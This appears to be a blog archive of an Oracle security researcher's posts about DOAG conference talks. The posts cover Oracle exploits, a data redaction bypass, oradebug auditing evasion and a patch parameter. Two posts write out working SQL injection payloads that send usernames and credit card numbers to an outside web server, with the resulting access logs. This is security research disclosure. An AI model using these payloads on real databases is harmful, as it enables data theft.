Archive for the ‘Oracle Security’ Category

DOAG conference: Best of Oracle Security – older presentations (2013-2017)

Sonntag, November 25th, 2018

Here is a list of older „Best-of“-presentations:

Best of Oracle Security 2017

Best of Oracle Security 2016

Best of Oracle Security 2015

Best of Oracle Security 2014

Best of Oracle Security 2013

DOAG 2018: Best of Oracle Security 2018

Sonntag, November 25th, 2018

Last week I gave my yearly presentation “Best of Oracle Security 2018” at the DOAG 2018 conference in Nürnberg. In this presentation I talked about different Oracle exploits, a vulnerability in, DNS data exfiltration in Oracle and how to audit SYSDBA connections in Oracle


Additionally I talked about the German DSGVO (GDPR) – „Wie wird die DSGVO umgesetzt und welche Lücken/Lügen gibt es?


DOAG 2015: Best of Oracle Security 2015

Donnerstag, November 19th, 2015

Yesterday I gave my yearly presentation “Best of Oracle Security 2015” at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found/modified released in 2015 in various sources.

One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting,,, 12.1.02, fixed in April 2015 CPU). This bug can be used as helper function in Out-of-band-SQL Injection attacks. Since Oracle 11g the way via utl_http/httpuritype was closed using the ACLs. This exploit opens the possibility in 11g/12g again (if patches are not applied).

—— Out-of-Band SQL Injection Example —————-′ or  1=extractvalue(xmltype(‚<?xml version=“1.0″ encoding=“UTF-8″?><!DOCTYPE root [ <!ENTITY % remote SYSTEM „’||substr((select sys.stragg(distinct username||‘-‚) as string from all_users),1,220)||'“> %remote; %param1;]>‘),’/l‘) – – [18/Nov/2015 00:48:02]  „GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0“ 404 –

—— Out-of-Band SQL Injection Example —————-

Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.

Best of Oracle Security 2013

Freitag, November 22nd, 2013

I just uploaded my DOAG 2013 presentation „Best of Oracle Security 2013„.


This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, Hide information from Oracle Auding using VPD and more…


SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at „ORDSYS.ORDERROR“, line 5
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 1394
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 479
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 8232
ORA-06512: at „ORDSYS.ORD_DICOM“, line 756
ORA-06512: at line 1




select * from credit_card where 1=length(utl_http.request(‚’||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause


——– output from access.log ———— – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /1234-1234-1234-1234 HTTP/1.1″ 404 35 – – – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /5678-5678-5678-5678 HTTP/1.1″ 404 35 – –

——– output from access.log ————



Fix for oradebug disable auditing available (

Freitag, September 13th, 2013

2 days ago I gave a presentation „Oracle 12c from the attackers perspective“ at the DOAG SIG Security. I learned some interesting things, especially that a fix for the Oracle oradebug „disable auditing“ problem is available since 9 months.

Oradebug allows to run OS commands and to enable/disable Oracle SYSDBA and normal auditing on the fly without leaving traces in the audit log. The fix for this problem is available in Oracle and was backported to using the patches 15805002, 15808245, 16177780.

By default the setting is not enabled in Oracle

The undocumented parameter  _fifteenth_spare_parameter (Oracle Description: fifteenth spare parameter – integer – Yeah, really useful)  can now disable or limit the oradebug functionality. I could not find any information about this parameter on google or my oracle support.

—— extract from the read me.txt of the patch file——————

## _fifteenth_spare_parameter can be set to „all“, „restricted“ or „none“
## „all“ disables execution of all oradebug commands, „restricted“ disables
## execution of restricted oradebug commands, „none“ (default) allows execution
## of oradebug commands.

—— extract from the read me.txt ——————